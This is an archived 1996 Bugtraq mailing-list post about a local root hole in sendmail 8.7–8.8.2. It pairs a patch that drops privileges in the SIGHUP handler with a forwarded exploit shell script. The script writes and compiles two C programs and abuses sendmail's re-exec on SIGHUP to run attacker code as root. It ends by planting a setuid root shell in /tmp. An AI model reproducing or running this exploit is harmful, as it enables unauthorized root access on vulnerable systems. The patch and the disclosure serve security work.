[3967] in bugtraq
BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). (fwd)
daemon@ATHENA.MIT.EDU (Ryan P. Skadberg)
Sun Jan 26 13:45:37 1997
Date: Sat, 16 Nov 1996 12:07:34 -0500
Reply-To: skadberg@wicked.stigmata.org
From: "Ryan P. Skadberg" <skadberg@wicked.stigmata.org>
To: BUGTRAQ@netspace.org
Got this from BOS, both the patch and the exploit are here.
Skadz
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
> Huh. Yet another gaping hole, can you believe it? This is entirely
> platform-independent, and has not yet been fixed in 8.2.2. Here's
> the patch to fix it. This was done on 8.7.6; the line numbers may
> differ in other versions but the patch is the same.
>
> ------------------------------------------------------
> --- main.c.old Mon Sep 16 12:56:01 1996
> +++ main.c Fri Nov 15 23:56:48 1996
> @@ -1693,14 +1693,16 @@
> sighup()
> {
> #ifdef LOG
> if (LogLevel > 3)
> syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
> #endif
> releasesignal(SIGHUP);
> + (void) setgid(RealGid);
> + (void) setuid(RealUid);
> execv(SaveArgv[0], (ARGV_T) SaveArgv);
> #ifdef LOG
> if (LogLevel > 0)
> syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]);
> #endif
> exit(EX_OSFILE);
> }
> ------------------------------------------------------
>
> Now who the heck to I send this to to get it back into sendmail? There
> are no e-mail addresses listed for bug reports in the READ_ME file, or
> anywhere else for that matter.
>
> cjs
>
> Curt Sampson cjs@portal.ca Info at http://www.portal.ca/
> Internet Portal Services, Inc.
> Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil.
>
> On Sat, 16 Nov 1996, Leshka Zakharoff wrote:
>
> > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK)
> > From: Leshka Zakharoff <leshka@leshka.chuvashia.su>
> > To: best-of-security@suburbia.net
> > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100
> > Resent-From: best-of-security@suburbia.net
> >
> > #-------------------------------- CUT HERE -------------------------------------
> > #/bin/sh
> > #
> > #
> > # Hi !
> > # This is exploit for sendmail smtpd bug
> > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
> > # This shell script does a root shell in /tmp directory.
> > # If you have any problems with it, drop me a letter.
> > # Have fun !
> > #
> > #
> > # ----------------------
> > # ---------------------------------------------
> > # ----------------- Dedicated to my beautiful lady ------------------
> > # ---------------------------------------------
> > # ----------------------
> > #
> > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
> > #
> > #
> > #
> > echo 'main() '>>leshka.c
> > echo '{ '>>leshka.c
> > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
> > echo '} '>>leshka.c
> > #
> > #
> > echo 'main() '>>smtpd.c
> > echo '{ '>>smtpd.c
> > echo ' setuid(0); setgid(0); '>>smtpd.c
> > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
> > echo '} '>>smtpd.c
> > #
> > #
> > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
> > ./leshka
> > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
> > rm leshka.c leshka smtpd.c /tmp/smtpd
> > /tmp/sh
> > #-------------------------------- CUT HERE -------------------------------------
> >
> >
>
